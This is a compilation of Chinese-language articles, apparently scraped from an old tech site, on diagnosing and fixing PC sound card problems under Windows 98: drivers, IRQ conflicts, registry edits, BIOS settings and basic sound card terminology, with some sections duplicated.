    第二步，将“声音、视频和游戏控制器”中被打了叉号或者感叹号的项目删除，然后点击“刷新”命令或重新启动计算机。

    第三步，刷新（或重启系统）后，系统一般会发现新硬件，并出现一个新硬件对话框要求您为它安装驱动程序。在询问驱动程序路径的时候请插入相应的驱动盘，然后单击“从磁盘安装”按钮。在弹出的对话框中输入或者选择驱动盘的盘符（当然，也可单击“浏览”按钮，在出现的对话框中选择驱动盘的盘符与路径），单击“确定”按钮，安装驱动程序。

    安装好驱动程序后，操作系统会自己寻找声卡，然后自动安装其认为最匹配的驱动程序。如果声卡仍不能发声，可在“设备管理器”中删除“声音、视频和游戏控制器”下面的项目，然后使用方法二来安装驱动程序。

    2、手动添加声卡

    第一步，依次选择“开始→设置→控制面板”，双击“控制面板”窗口中的“添加新硬件”项目。

    第二步，在“添加新硬件”向导中，系统会询问你是否自动检测与配置新硬件，请选择“否”，然后单击“下一步”按钮，Windows会列出所有可选择安装的硬件设备。

    第三步，在“硬件类型”中选择“声音、视频和游戏控制器”选项，单击“下一步”按钮，进入路径的选择界面。

    第四步，单击“从磁盘安装”按钮，选择驱动程序所在的路径，安装声卡驱动程序。

    如果上述方法不能使您的声卡恢复正常，请再一次删除被打了叉或者带有感叹号的相关项目进入方法三。

    3、避免资源冲突

    首先检查声卡是否与其他硬件存在资源冲突，特别是声卡的IRQ值，建议让声卡占用IRQ 9或10。然后在“设备管理器”选项页中找找是否存在“检测到的其他设备”或者是“未知设备”的选项，在找到了上述的这些选项后（Windows 98将没有认出的设备都放在这里），用鼠标双击它们，删除带有sound、midi、wave等字样的项目，然后重新启动电脑，按照方法一中相应的步骤进行操作。

    4、修改注册表

    安装好声卡驱动程序后，如果“声音、视频和游戏控制器”中的选项都带有感叹号，则可以通过修改注册表的方法来解决此问题。

    第一步，选中那些不正常的选项，单击“属性”，选择“驱动程序”，弹出一个对话框显示了这些不正常的选项的驱动程序信息，

    第二步，单击“驱动程序的详细资料”按钮，在“驱动程序文件”列表框中列出了驱动程序的详细信息。如果这些驱动程序中有扩展名为“.386”的文件，记住这个文件的名称。

    第三步，使用Sysedit或者Edit打开C:\Windows文件夹中的System.ini文件，在System.ini文件中查找您刚才记住的那些文件名，在所有含有那些文件名的命令行前面加上一个“；”或者“Rem”字符，这样这些命令行就会失效。

    第四步，运行注册表编辑器Regedit，在HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\MEDIA分支下找到包含有您记住的文件名的键，双击它们，然后按键盘上的“Delete”键将之从注册表中删除。

    重新启动计算机，此时问题应该已经解决。

    问题二 操作系统无法识别声卡怎么办？

    答：此类问题多是因为声卡没有安装好，或声卡不支持即插即用，以及驱动程序太老无法支持新的操作系统引起的。可以通过下面的方法来解决：

    1、重新安装声卡

    第一步，切断电源，打开机箱，从主板上拔下声卡。

    第二步，清洁声卡的金手指，然后将声卡重新插回主板（可换槽插入）。

    第三步，开机检查系统是否已发现声卡。

    2、手动添加声卡

    见问题一中的解决方法2。

    3、更新驱动程序

    到网上搜索声卡的最新驱动，如果没有的话，可用型号相近或音效芯片相同的声卡的驱动程序来代替。

    通过上述操作，您的声卡应该能够被操作系统识别出来了。（未完待续）


电脑声音失真故障的处理

《一键清理系统垃圾》

电脑声音失真故障的处理

   如果电脑出现声音失真的故障，可通过如下途径处理
   1、检查是否安装了最新的声卡驱动程序。
   2、扬声器的品质可能有问题。品质较低的扬声器在低音时往往比品质较高的扬声器更容易失真。如果扬声器的品质较低，只有经过硬件升级才能提高播放效果。
   3、声音失真可能是由于发送给扬声器的音量太高，超出扬声器的处理范围，此时应设法降低发送给扬声器的音量。
   4、计算机上可能存在硬件设备冲突。检查"设备管理器"选项卡中是否包含该设备并且没有冲突。⑴单击"开始"，指向"设置"，再单击"控制面板"，然后双击"系统"。⑵在"设备管理器"选项卡上，检查是否出现该设备以及该设备旁是否没有带感叹号的黄圈。如果设备旁出现带感叹号的黄圈，则表明该设备可能与计算机中的其他设备使用相同设置。如果发现带感叹号的黄圈：双击该设备，然后单击"资源"选项卡。 在"冲突的设备列表"中寻找资源冲突。如果存在资源冲突，请重新配置某个（些）设备，使其使用不同资源，以此消除冲突。具体操作方面的信息，请查阅设备文档，或者与生产商联系。 \　　5、检查"使用单模式 DMA"设置是否正确。检查"使用单模式 DMA"设置是否打开：\　　　⑴单击"开始"，指向"设置"，单击"控制面板"，然后双击"系统"。⑵在"设备管理器"选项卡上，双击"声音、视频和游戏控制器"，然后双击声卡。如果不知道声卡名称，请查阅声卡文档。⑶单击"属性"，然后再单击"设置"选项卡。⑷单击"高级设置"，然后再单击选中"使用单模式 DMA"复选框。如果"设置"选项卡上不出现"高级设置"按钮，则表明声卡不支持此项功能。⑸连续单击"确定"，返回"控制面板"，然后关闭"控制面板"。


集成声卡常见故障及解决

《一键清理系统垃圾》

集成声卡常见故障及解决

[color=Green]　　 随着主板集成度的逐步提高，集成声卡已经成为目前电脑的发展潮流，而且随着集成声卡芯片的技

术提高，大有取独立声卡而代之的趋势。

    根据通俗的分类，AC&#39;97声卡被分为硬声卡和软声卡两种，其中AC&#39;97硬声卡，首先大部分独立声卡都

是硬声卡；而集成在主板上的声卡也有硬声卡：这些声卡除了包含有Audio Codec芯片之外，还在主板上

集成了Digital Control芯片，即把芯片及辅助电路都集成到主板上。这些声卡芯片提供了独立的数字音

频处理单元和ADC与DAC的转换系统，最终输出模拟的声音信号。这种硬声卡和普通独立声卡区别不大，更

像是一种全部集成在主板上的独立声卡，而由于集成度的提高，CPU的负荷减轻，音质也有所提高，不过

相应的成本也有所增加，现在已很少被主板厂商采用。

    AC&#39;97软声卡则仅在主板上集成Audio Codec，而Digital Control这部分则由CPU完全取代，节约了不

少成本。根据AC&#39;97标准的规定，不同Audio Codec97芯片之间的引脚兼容，原则上可以互相替换。也就是

说，AC&#39;97软声卡只是一片基于AC&#39;97标准的CODEC芯片，不含数字音频处理单元，因此电脑在播放音频信

息时，除了D/A和A/D转换以外所有的处理工作都要交给CPU来完成。可以这样说，AC’97软声卡只是简化

了硬件，而设计思路仍是贯彻AC&#39;97的规格标准的声卡。也有部分消费者就认为：软声卡就是没有Digital

Control芯片，而是采用软件模拟，所以就存在两个问题：首先其CPU占用率肯定较高，容易产生爆音，其

次音质也不可以和普通的独立声卡相提并论。

    其实随着CPU主频的不断提高，音频数据处理量却并没有增加多少，所谓的CPU占用率的问题早已被忽

略不计。而关于音质方面，虽然还难以和高档的独立声卡相比较，但是随着SoundMAX 3.0驱动的不断升级

和改进，使AC&#39;97软声卡拥有硬件级的数据处理转换能力和最高94dB信噪比的专业音质回放能力，增加的

Sensaura为3D定位音效，与XG兼容的Sondius-XG的MIDI软波表，以及最新的音效演算法SPX，将AC&#39;97软声

卡提升至一个前所未有的高度，彻底改变了消费者心目中音质不佳的形象。

    声卡在使用过程中常常会遇到一些稀奇古怪的问题，其中包括硬件问题，也包含无数的软件故障，下

面将选出一些具有代表性的问题，通过对这些问题和解决方法的了解，消费者可以根据情况作出相应的处

理，及时解决实际问题。[/color]
[color=Red]　一、声卡无声[/color]
如果声卡安装过程一切正常，设备都能正常识别，一般来说出现硬件故障的可能性就很小。

[color=Blue]　　1.与音箱或者耳机是否正确连接。

    2.音箱或者耳机是否性能完好。

    3.音频连接线有无损坏。

    4.Windows音量控制中的各项声音通道是否被屏蔽。

    如果以上4条都很正常，依然没有声音，那么我们可以试着更换较新版本的驱动程序试试，并且记得

安装主板或者声卡的最新补丁。[/color]

[color=Red]二、播放MIDI无声[/color]

[color=Blue]某些声卡在播放MP3、玩游戏时非常正常，但就是无法播放MIDI文件。从原理来看，声卡本身并没有

问题，应该属于设置问题。

    可以到控制面板→多媒体→音频→MIDI音乐播放，选择合适的播放设备即可。当然也可能是在

Windows音量控制中的MIDI通道被设置成了静音模式，将静音勾选去掉即可。[/color]

[color=Red]三、播放CD无声[/color]

[color=Blue]如果播放MP3有声音，应该可以排除声卡故障。最大的可能就是您没有连接好CD音频线。

    普通的CD-ROM上都可以直接对CD解码，通过CD-ROM附送的4芯线和声卡连接。线的一头与CD-ROM上的

ANALOG音频输出相连，另一头和集成声卡的CD IN相连，CD -IN一般在集成声卡芯片的周围可以找到，需

要注意的是音频线有大小头之分，必须用适当的音频线与之配合使用。[/color]

[color=Red]四、无法播放WAV音频文件[/color]

[color=Blue]不能播放WAV音频文件往往是因为“控制面板→多媒体→设备”下的音频设备不止一个，这时禁用一[/color]

[color=Red]五、播放时有噪音[/color]

[color=Blue]信噪比一般是产生噪音的罪魁祸首，集成声卡尤其受到背景噪音的干扰，不过随着声卡芯片信噪比参

数的加强，大部分集成声卡信噪比都在75dB以上，有些高档产品信噪比甚至达到95dB，出现噪音的问题越

来越小。而除了信噪比的问题，杂波电磁干扰就是噪音出现的唯一理由。由于某些集成声卡采用了廉价的

功放单元，做工和用料上更是不堪入目，信噪比远远低于中高档主板的标准，自然噪音就无法控制了。

    由于Speaker out采用了声卡上的功放单元对信号进行放大处理，虽然输出的信号“大而猛”，但信

噪比很低。而Line out则绕过声卡上的功放单元，直接将信号以线路传输方式输出到音箱，如果在有背景

噪音的情况下不妨试试这个方法，相信会改进许多。不过如果你采用的是劣质的音箱，相信改善不会很大


集成声卡故障处理大全(二)

《一键清理系统垃圾》

集成声卡故障处理大全(二)

    五、播放时有噪音

    信噪比一般是产生噪音的罪魁祸首，集成声卡尤其受到背景噪音的干扰，不过随着声卡芯片信噪比参数的加强，大部分集成声卡信噪比都在75dB以上，有些高档产品信噪比甚至达到95dB，出现噪音的问题越来越小。而除了信噪比的问题，杂波电磁干扰就是噪音出现的唯一理由。由于某些集成声卡采用了廉价的功放单元，做工和用料上更是不堪入目，信噪比远远低于中高档主板的标准，自然噪音就无法控制了。

    由于Speaker out采用了声卡上的功放单元对信号进行放大处理，虽然输出的信号“大而猛”，但信噪比很低。而Line out则绕过声卡上的功放单元，直接将信号以线路传输方式输出到音箱，如果在有背景噪音的情况下不妨试试这个方法，相信会改进许多。不过如果你采用的是劣质的音箱，相信改善不会很大。

    六、声卡在运行大型程序时出现爆音

    由于集成软声卡数字音频处理依靠CPU，而如果电脑配置过低就可能出现这种问题。

    在控制面板中，选择系统→设备管理器，选中磁盘驱动器，找到硬盘的参数项，双击参数项，在弹出的界面中将硬盘的DMA选项前面的勾号去除。不过在关闭了DMA数据接口之后会降低系统的性能；或者安装最新的主板补丁和声卡补丁，更换最新的驱动程序也可以取得一定效果。

    七、安装新的Direct X之后，声卡不发声

    某些声卡的驱动程序和新版本的Direct X不兼容，导致声卡在新Direct X下无法发声。

    若当你安装了新版本的Direct X后声卡不能发声了，则需要为声卡更换新的驱动程序或“Direct X随意卸”等工具将Direct X卸载后重装老的版本。

    八、Direct X诊断时显示不支持硬件缓冲，声卡不发声

    软件缓冲区太小，导致无法发声。

    打开控制面板，多媒体属性→设备→媒体控制设备→波形音响设备，其中有个设置选项，将默认4秒的软件缓冲容量改成最大的9秒即可。

    九、超频之后声卡不能正常使用

    由于超频使用，有些集成声卡工作在非正常频率下，会出现爆音、不发声等现象。

    笔者建议不要超频，这样声卡的正常工作是没有问题的。如果一定要超频使用，尽量工作在标准频率下，这样集成声卡也能工作在正常频率下，一般也能保证正常的使用。

    十、声卡不能录音

    大部分集成声卡都是全双工声卡，而录音部分单独损坏几率也非常小。

    首先检查插孔是否为“麦克风输入”，然后双击“小喇叭”图标，选择菜单上的“属性→录音”，看看各项设置是否正确。接下来在“控制面板→多媒体→设备”中调整“混合器设备”和“线路输入设备”，把它们设为“使用”状态。然后到“控制面板→多媒体→音频→录音首选设备”，点击那个麦克风小图标就可以进入“录音控制”了，在这里可以预设好需要的录音通道，随后就可以使用录音功能了。如果这个小东西变成灰色的话，可以试试将声卡删除重装。

    当然也存在特殊情况：因为集成声卡一般都没有功放芯片，无法推动高档的录音设备，所以造成无法录音，在这种情况下可以更换高档次的声卡，或者更换档次更高的主板。笔者的苹果MIC就只能在ASUS主板上或者SB LIVE声卡上使用。当然，如果你不在乎MIC的效果，可以更换一个低档的MIC来解决问题。

    十一、集成声卡在播放任何音频文件时都类似快进效果

    由于声卡已经发声，相信问题可能出在设置和驱动上。

    如果电脑正在超频使用，首先应该降低频率，然后关闭声卡的加速功能，如果这样还是不行，应该寻找主板和声卡的补丁以及新驱动程序。


集成声卡故障处理大全(三)

《一键清理系统垃圾》

集成声卡故障处理大全(三)

    十二、不能正常使用四声道

    某些集成声卡能够正常发声，无法使用四声道模式，相信还是设置问题。

    很多声卡都是通过软件模拟出四声道，简单地将前置音箱的声音复制到后置音箱上，这样在播放MP3和或者听CD的时候都是四声道，而在进行3D游戏或者播放DVD的时候就没有办法了，也可以说这些声卡，不是真正的四声道。

    十三、运行网络聊天程序时，声音断断续续

    其实这个问题并不关声卡的事情，因为受到网络流量的限制，网络带宽无法流畅地传递声音信号。

    尽量在网络聊天时不要打开大型程序，也不要有下载等大流量的网络操作，如果能够更换网络接入方式，增加带宽，将是一劳永逸的办法。

    十四、多次更换声卡之后，重新使用集成声卡时，WINDOWS提示没有发现硬件驱动程序

    此类故障一般是由于在第一次装入驱动程序时没有正常完成，或在CONFIG.SYS、自动批处理文件AUTOEXEC.BAT、DOSSTART.BAT文件中已经运行了某个声卡驱动程序。

    对此可以将里面运行的某个驱动程序文件删除即可，当然，也可以将上面提到的三个文件删除来解决该故障。如果在上面三个文件里面没有任何文件，而驱动程序又装不进去，此时需要修改注册表，点击“开始”菜单——“运行”，在对话框中输入“regedit”回车，将与声卡相关的注册表项删除（如声卡型号为ALc650，点选注册表项的“编辑”——“查找”，输入ALS300，然后再将找到的字节删除，再按F3继续查找下一个，依次将找到的选项删除即可）。

    十五、BIOS设置

    对BIOS不熟悉的用户误操作屏蔽了板载声卡。

    进入BIOS，选择I/O Device configuration→Onboard AC97 Audio Controller,选择ENANLE或者AUTO即可。这个过程是在笔者的ASUS主板上通过的，在其他主板上也基本类似，如果是Award BIOS，进入BIOS中的“Intergrated Peripherals”，再选“AC97 Audio”改“Auto”为“Disable”保存即可。

    十六、安装网卡或者其他设备之后，声卡不再发声

    这种问题比较具有代表性，大多由于兼容性问题和中断冲突造成。

    驱动兼容性的问题比较好解决，用户可以更新各个产品的驱动即可。而中断冲突就比较麻烦。首先进入控制面板→系统→设备管理器，查询各自的IRQ中断，并可以直接在手动设定IRQ，消除冲突即可。如果在设备管理器无法消除冲突，最好的方法是回到BIOS中，关闭一些不需要的设备，空出多余的IRQ中断。也可以将网卡或其他设备换个插槽，这样也将改变各自的IRQ中断，以便消除冲突。在换插槽之后应该进入BIOS中的“PNP/PCI”项中将“Reset Configutionration Data”改为ENABLE，清空PCI设备表，重新分配IRQ中断即可。


集成声卡故障处理大全(一)

《一键清理系统垃圾》

集成声卡故障处理大全(一)

    随着主板集成度的逐步提高，集成声卡已经成为目前电脑的发展潮流，而且随着集成声卡芯片的技术提高，大有取独立声卡而代之的趋势。

    根据通俗的分类，AC'97声卡被分为硬声卡和软声卡两种，其中AC'97硬声卡，首先大部分独立声卡都是硬声卡；而集成在主板上的声卡也有硬声卡：这些声卡除了包含有Audio Codec芯片之外，还在主板上集成了Digital Control芯片，即把芯片及辅助电路都集成到主板上。这些声卡芯片提供了独立的数字音频处理单元和ADC与DAC的转换系统，最终输出模拟的声音信号。这种硬声卡和普通独立声卡区别不大，更像是一种全部集成在主板上的独立声卡，而由于集成度的提高，CPU的负荷减轻，音质也有所提高，不过相应的成本也有所增加，现在已很少被主板厂商采用。

    AC'97软声卡则仅在主板上集成Audio Codec，而Digital Control这部分则由CPU完全取代，节约了不少成本。根据AC'97标准的规定，不同Audio Codec97芯片之间的引脚兼容，原则上可以互相替换。也就是说，AC'97软声卡只是一片基于AC'97标准的CODEC芯片，不含数字音频处理单元，因此电脑在播放音频信息时，除了D/A和A/D转换以外所有的处理工作都要交给CPU来完成。可以这样说，AC’97软声卡只是简化了硬件，而设计思路仍是贯彻AC'97的规格标准的声卡。也有部分消费者就认为：软声卡就是没有Digital Control芯片，而是采用软件模拟，所以就存在两个问题：首先其CPU占用率肯定较高，容易产生爆音，其次音质也不可以和普通的独立声卡相提并论。

    其实随着CPU主频的不断提高，音频数据处理量却并没有增加多少，所谓的CPU占用率的问题早已被忽略不计。而关于音质方面，虽然还难以和高档的独立声卡相比较，但是随着SoundMAX 3.0驱动的不断升级和改进，使AC'97软声卡拥有硬件级的数据处理转换能力和最高94dB信噪比的专业音质回放能力，增加的Sensaura为3D定位音效，与XG兼容的Sondius-XG的MIDI软波表，以及最新的音效演算法SPX，将AC'97软声卡提升至一个前所未有的高度，彻底改变了消费者心目中音质不佳的形象。

    声卡在使用过程中常常会遇到一些稀奇古怪的问题，其中包括硬件问题，也包含无数的软件故障，下面将选出一些具有代表性的问题，通过对这些问题和解决方法的了解，消费者可以根据情况作出相应的处理，及时解决实际问题。

    一、声卡无声

    如果声卡安装过程一切正常，设备都能正常识别，一般来说出现硬件故障的可能性就很小。

    1.与音箱或者耳机是否正确连接。

    2.音箱或者耳机是否性能完好。

    3.音频连接线有无损坏。

    4.Windows音量控制中的各项声音通道是否被屏蔽。

    如果以上4条都很正常，依然没有声音，那么我们可以试着更换较新版本的驱动程序试试，并且记得安装主板或者声卡的最新补丁。

    二、播放MIDI无声

    某些声卡在播放MP3、玩游戏时非常正常，但就是无法播放MIDI文件。从原理来看，声卡本身并没有问题，应该属于设置问题。

    可以到控制面板→多媒体→音频→MIDI音乐播放，选择合适的播放设备即可。当然也可能是在Windows音量控制中的MIDI通道被设置成了静音模式，将静音勾选去掉即可。

    三、播放CD无声

    如果播放MP3有声音，应该可以排除声卡故障。最大的可能就是您没有连接好CD音频线。

    普通的CD-ROM上都可以直接对CD解码，通过CD-ROM附送的4芯线和声卡连接。线的一头与CD-ROM上的ANALOG音频输出相连，另一头和集成声卡的CD IN相连，CD -IN一般在集成声卡芯片的周围可以找到，需要注意的是音频线有大小头之分，必须用适当的音频线与之配合使用。

    四、无法播放WAV音频文件

    不能播放WAV音频文件往往是因为“控制面板→多媒体→设备”下的音频设备不止一个，这时禁用一个即可。


默认设置惹的祸——排除声卡故障

《一键清理系统垃圾》

默认设置惹的祸——排除声卡故障

《中国电脑教育报》成兆义

    自从升级了显卡后，我总觉得声卡有点不正常。玩游戏时背景音乐略带有噪音（以前没有过啊），对声卡设置进行更改，结果“涛声依旧”。查看声卡驱动程序的详细信息，是1998年的，难道是“廉颇老矣”了。

    我马上“驱猫”上网，在驱动之家（www.mydrivers.com）找到了较新的Yamaha 724声卡的驱动：4.07.1040版本（2000年），虽然版本还是比较老，但已经比原来的强多了。

    下载并安装完新的驱动后，听歌和玩游戏时声音效果都有了不同程度的提高（心理作用吧）。我满心欢喜地进入到盟军敢死队（使命的召唤）中，心想这下可以感受一下紧张的战斗气氛了……点击游戏画面左上角的“特种兵”，咦？怎么没有说话？又分别点击其他队员，结果不是不发声就是成了“结巴”（声音断断续续）。又试了试开枪也存在类似的问题，难道声卡驱动安装不对？

    重新下载了一遍驱动，卸载原驱动后重新安装，问题依旧。排除硬件损坏的可能性，最有可能的就是设置方面的问题了。进入到“控制面板”中，打开“YAMAHA DS-XG 音响设置”。不应该有问题啊，我装了驱动后就没有改过设置，都是默认设置。但当我打开“DirectSound”选项卡时，突然想起原来旧驱动“硬件2次缓冲器”的默认设置是“全部无效”，现在怎么是“有效”呢？马上改回到“全部无效”，重新进入游戏，故障排除。

    经过这件事，我想给大家提个醒：很多情况下，软件的默认设置并不是最可靠的，要根据实际情况具体分析，才能达到最优的效果。


浅析声卡

《一键清理系统垃圾》

浅析声卡

    声卡已逐渐成为了计算机的标准配置，动人的音乐，有了它，会带给你身临其境的感受。我想没有人愿意关掉身边音箱的电源去玩没有背景音乐和各种音效的游戏。这位带给我们耳朵“享受”的“功臣”，究竟是怎样的，我想看了这篇文章，你就能做到“心中有数”了。
    自1998年以来，声卡接口已经从ISA转向了PCI。现在除了一些较老的机器上配置的是ISA声卡以外，市场上早以是难觅踪影了。PCI声卡以其迅捷的传输速率，较低的CPU占用率和较好的3D音效、出色的MIDI表现，赢得了市场的欢迎。
#1　　一、声卡的基本结构
    下^24030501a^为一款声卡的外观图，现将其主要部分按图上标准的数字顺序介绍如下。
    1．音效处理芯片：主要完成WAVE波形的采样与合成，MIDI音乐的合成，同时混音器、效果器也在其内部实现，是声卡最基本的部件。
    2．游戏／MIDI插口：用于连接游戏杆、手柄、方向盘等外界游戏控制器，同时也可用来连接MIDI键盘和电子琴。
    3．线性输出插孔（LINE OUT）：用于将声卡处理好的声音输入到有源音箱、耳机和功放。
    4．话筒输入插孔（MICIN）：用于连接话筒，主要用在语音识别、娱乐和录音等方面。
    5．线性输入插孔（LINE IN）：用于将随身听或电视机等外部设备的声音信号输入计算机。
    6．电话自动应答设备接口（TAD，Telephone Answering Device）：配合MODEM卡和软件，可使电脑具备电话自动应答功能。
    7．模拟CD音频输入接口（CD－IN）：将来自光驱的模拟音频信号接入。
    8．辅助音频输入口（AUX－IN）：用于将MPEG编／解码卡、电视卡、DVD解压卡等设备的声音信号输入声卡，使得各种设备的声音信号都通过声卡送到音箱。
    9．数字CD音频输入接口（CD－SPDIF）：作用是接收来自光驱的数字音频信号，确保最大限度地减少声音失真。
    10．数字子卡扩展插针（SPDIF－EXT）：用于与配套的子卡连接，实现数字信号的输入和输出。使得声卡能和专用的数字录音设备相连接（如：DAT、MD），并可输出AC－3信号等。
    随着计算机整体性能的提高，人们不断地追求更加完美的音乐与音效，因而对声卡的要求也越来越高，今天的声卡早已被各式各样的专用术语所“包围”，那我们就来看看它们究竟都是什么意思吧！
#1　　二、声卡的基本术语
    采样位数：即采样值或取样值。它是用来衡量声音波动变化的一个参数，也就是声卡的分辨率。它的数值越大，分辨率也就越高，所发出声音的能力越强。由于受人耳的声音精确度限制，多媒体电脑中采用16位的声卡。
    采样频率：即取样频率，指每秒钟取得声音样本的次数。采样频率越高，声音的质量也就越好，声音的还原也就越真实，但同时它占的资源比较多。由于人耳的分辨率很有限，太高的频率并不能分辨出来。在16位声卡中有22KHz、44KHz等几级，其中，22KHz相当于普通FM广播的音质，44KHz已相当于CD音质了，目前的常用采样频率都不超过48KHz。
    MIDI：是Musical Instrument Digital Interface的简称，意为音乐设备数字接口。它是一种电子乐器之间以及电子乐器与电脑之间的统一交流协议。很多流行的游戏、娱乐软件中都有不少以MID、RMI为扩展名的MIDI格式音乐文件。MIDI文件是一种描述性的“音乐语言”，它将所要演奏的乐曲信息用字节进行描述。譬如在某一时刻，使用什么乐器，以什么音符开始，以什么音调结束，加以什么伴奏等等，也就是说MIDI文件本身并不包含波形数据，所以MIDI文件非常小巧。MIDI要形成电脑音乐必须通过合成。早期的ISA声卡普遍使用的是FM合成，即“频率调变”。它运用声音振荡的原理对MIDI进行合成处理，由于技术本身的局限，效果很难令人满意。而现在的声卡大都采用的是波表合成了，它首先将各种真实乐器所能发出的所有声音（包括各个音域、声调）进行取样，存储为一个波表文件。在播放时，根据MIDI文件记录的乐曲信息向波表发出指令，从“表格”中逐一找出对应的声音信息，经过合成、加工后回放出来。由于它采用的是真实乐器的采样，所以效果自然要好于FM。一般波表的乐器声音信息都以44.1KHz、16Bit的精度录制，以达到最真实的回放效果。理论上，波表容量越大合成效果越好。根据取样文件放置位置和由专用微处理器或CPU来处理的不同，波表合成又常被分为软波表和硬波表。
    MP3 WAV：是将声音文件采用专门的算法按1比10的比例压缩成很小的文件进行存储。而WAV则记录的是声音的本身，所以它占的硬盘空间很大。例如：16位的44.1KHz的立体声声音，一分钟要占用大约10MB的容量，和MIDI相比就差得很远。

作者：龙飞


声卡

《一键清理系统垃圾》

声卡

[color=Red]常见故障一：声卡无声。出现这种故障常见的原因有：[/color]
[color=Blue]1. 驱动程序默认输出为“静音”。单击屏幕右下角的声音小图标（小嗽叭），出现音量调节滑块，下方有“静音”选项，单击前边的复选框，清除框内的对号，即可正常发音。

    2. 声卡与其它插卡有冲突。解决办法是调整PnP卡所使用的系统资源，使各卡互不干扰。有时，打开“设备管理”，虽然未见黄色的惊叹号（冲突标志），但声卡就是不发声，其实也是存在冲突，只是系统没有检查出来。

    3. 安装了Direct X后声卡不能发声了。说明此声卡与Direct X兼容性不好，需要更新驱动程序。

    4. 一个声道无声。检查声卡到音箱的音频线是否有断线。
[/color]

[color=Red]见故障二：声卡发出的噪音过大．出现这种故障常见的原因有：[/color]
[color=Blue]1. 插卡不正。由于机箱制造精度不够高、声卡外挡板制造或安装不良导致声卡不能与主板扩展槽紧密结合，目视可见声卡上“金手指”与扩展槽簧片有错位。这种现象在ISA卡或PCI卡上都有，属于常见故障。一般可用钳子校正。

    2. 有源音箱输入接在声卡的Speaker输出端。对于有源音箱，应接在声卡的Line out端，它输出的信号
没有经过声卡上的功放，噪声要小得多。有的声卡上只有一个输出端，是Line out还是Speaker要靠卡上的跳线决定，厂家的默认方式常是Speaker，所以要拔下声卡调整跳线。

    3. Windows自带的驱动程序不好。在安装声卡驱动程序时，要选择“厂家提供的驱动程序”而不要选
“Windows默认的驱动程序”如果用“添加新硬件”的方式安装，要选择“从磁盘安装”而不要从列表框中选择。如果已经安装了Windows自带的驱动程序，可选“控制面板→系统→设备管理→声音、视频和游戏控制器”，点中各分设备，选“属性→驱动程序→更改驱动程序→从磁盘安装”。这时插入声卡附带的磁盘或光盘，装入厂家提供的驱动程序。
[/color]

[color=Red]常见故障三：声卡无法“即插即用” [/color]
[color=Blue]1. 尽量使用新驱动程序或替代程序。笔者曾经有一块声卡，在Windows 98下用原驱动盘安装驱动程序怎么也装不上，只好用Creative SB16驱动程序代替，一切正常。后来升级到Windows Me，又不正常了再换用Windows 2000（完整版）自带的声卡驱动程序才正常。

    2. 最头痛的问题莫过于Windows 9X下检测到即插即用设备却偏偏自作主张帮你安装驱动程序，这个驱动程序偏是不能用的，以后，每次当你删掉重装都会重复这个问题，并且不能用“添加新硬件”的方法解决。笔者在这里泄露一个独门密招：进入Win9xinfother目录，把关于声卡的＊.inf文件统统删掉再重新启动后用手动安装，这一着百分之百灵验，曾救活无数声卡性命……当然，修改注册表也能达到同样的目的。

    3. 不支持PnP声卡的安装（也适用于不能用上述PnP方式安装的PnP声卡）：进入“控制面板”/“添加新硬件”/“下一步”，当提示“需要Windows搜索新硬件吗？”时，选择“否”，而后从列表中选取“声音、视频和游戏控制器”用驱动盘或直接选择声卡类型进行安装。
[/color]

[color=Red]常见故障四：播放CD无声 [/color]
[color=Blue]1. 完全无声。用Windows 98的“CD播放器”放CD无声，但“CD播放器”又工作正常，这说明是光驱的音频线没有接好。使用一条4芯音频线连接CD－ROM的模拟音频输出和声卡上的CD－in即可，此线在购买CD－ROM时会附带。

    2. 只有一个声道出声。光驱输出口一般左右两线信号，中间两线为地线。由于音频信号线的4条线颜色一般不同，可以从线的颜色上找到一一对应接口。若声卡上只有一个接口或每个接口与音频线都不匹配，只好改动音频线的接线顺序，通常只把其中2条线对换即可。
[/color]

[color=Red]常见故障五：PCI声卡出现爆音[/color]
[color=Red]一般是因为PCI显卡采用Bus Master技术造成挂在PCI总线上的硬盘读写、鼠标移动等操作时放大了背景
噪声的缘故。解决方法：关掉PCI显卡的Bus Master功能，换成AGP显卡，将PCI声卡换插槽上[/color]

[color=Red]常见故障六：无法正常录音 [/color]
[color=Blue]首先检查麦克风是否有没有错插到其他插孔中了，其次，双击小喇叭，选择选单上的“属性→录音”，看看各项设置是否正确。接下来在“控制面板→多媒体→设备”中调整“混合器设备”和“线路输入设备”，把它们设为“使用”状态。如果“多媒体→音频”中“录音”选项是灰色的那可就糟了，当然也不是没有挽救的余地，你可以试试“添加新硬件→系统设备”中的添加“ISA Plug and Play bus”，索性把声卡随卡工具软件安装后重新启动。
[/color]

[color=Red]常见故障七：无法播放Wav音乐、Midi音乐 [/color]
[color=Blue]不能播放Wav音乐现象比较罕见，常常是由于“多媒体”→“设备”下的“音频设备”不只一个，禁用一个即可；无法播放MIDI文件则可能有以下3种可能：

    1. 早期的ISA声卡可能是由于16位模式与32位模式不兼容造成MIDI播放的不正常，通过安装软件波表的
方式应该可以解决

    2. 如今流行的PCI声卡大多采用波表合成技术，如果MIDI部分不能放音则很可能因为您没有加载适当的波表音色库。

    3. Windows音量控制中的MIDI通道被设置成了静音模式[/color]

[color=Red]常见故障八：PCI声卡在WIN98下使用不正常 [/color]
[color=Blue]有些用户反映，在声卡驱动程序安装过程中一切正常，也没有出现设备冲突，但在WIN98下面就是无法出声或是出现其他故障。这种现象通常出现在PCI声卡上，请检查一下安装过程中您把PCI声卡插在的哪条PCI插槽上。有些朋友出于散热的考虑，喜欢把声卡插在远离AGP插槽，靠近ISA插槽的那几条PCI插槽中。问题往往就出现在这里，因为Windows98有一个Bug：有时只能正确识别插在PCI-1和PCI-2两个槽的声卡。而在ATX主板上紧靠AGP的两条PCI才是PCI-1和PCI-2（在一些ATX主板上恰恰相反，紧靠ISA的是PCI-1），所以如果您没有把PCI声卡安装在正确的插槽上，问题就会产生了。


声卡故障排除几例

《一键清理系统垃圾》

声卡故障排除几例

    经常遇到声卡不能发声或声音不正常的现象。如何排除故障，使声卡发出优美动听的声音呢？

    故障现象一:声卡无法“即插即用”
    原因及排除:检查声卡跳线是否正确。例如，一块联讯OPTI931声卡，有一说明书上没有的隐含跳线JP3，短路即为PnP，开路时Windows95认不出声卡，但出厂时默认为开路。

